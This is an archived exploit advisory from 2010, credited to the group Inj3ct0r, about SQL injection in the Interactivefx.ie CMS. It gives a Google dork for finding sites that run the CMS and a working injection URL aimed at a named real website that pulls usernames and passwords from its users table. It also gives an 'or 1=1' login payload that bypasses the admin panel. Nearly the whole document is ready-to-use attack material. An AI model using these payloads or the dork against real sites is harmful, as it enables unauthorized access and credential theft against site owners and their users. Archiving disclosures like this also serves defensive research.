Interactivefx.ie CMS SQL Injection Vulnerability

2010-03-25T00:00:00
ID SECURITYVULNS:DOC:23466
Type securityvulns
Reporter Securityvulns
Modified 2010-03-25T00:00:00

Description

================================================ Interactivefx.ie CMS SQL Injection Vulnerability ================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ 1 1 /' \ /'`\ /\ \ /'`\ 0 0 /\, \ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ 1 1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'_\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1 1 \ \\ \\ \\\ \ \ \_/\ \\\ \__\\ \____/\ \\ 0 0 \//\//\//\ \\ \// \// \/__/ \/___/ \// 1 1 \ \_/ >> Exploit database separated by exploit 0 0 \// type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

[+] Discovered By : Inj3ct0r

[+] Site : Inj3ct0r.com

[+] support e-mail : submit[at]inj3ct0r.com

[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net

Site product: Interactivefx.ie Product : Interactivefx.ie CMS Google dork: "Copyright Interactivefx.ie"

Sql Inj3ct0r Exploit:

http://www.garterlane.ie/event-details.php?id=223'+select+username,password+from+users/*

Bypass authentication in admin panel:

login: or 1=1/* pass: anypassyouwish

Inj3ct0r.com [2010-03-25]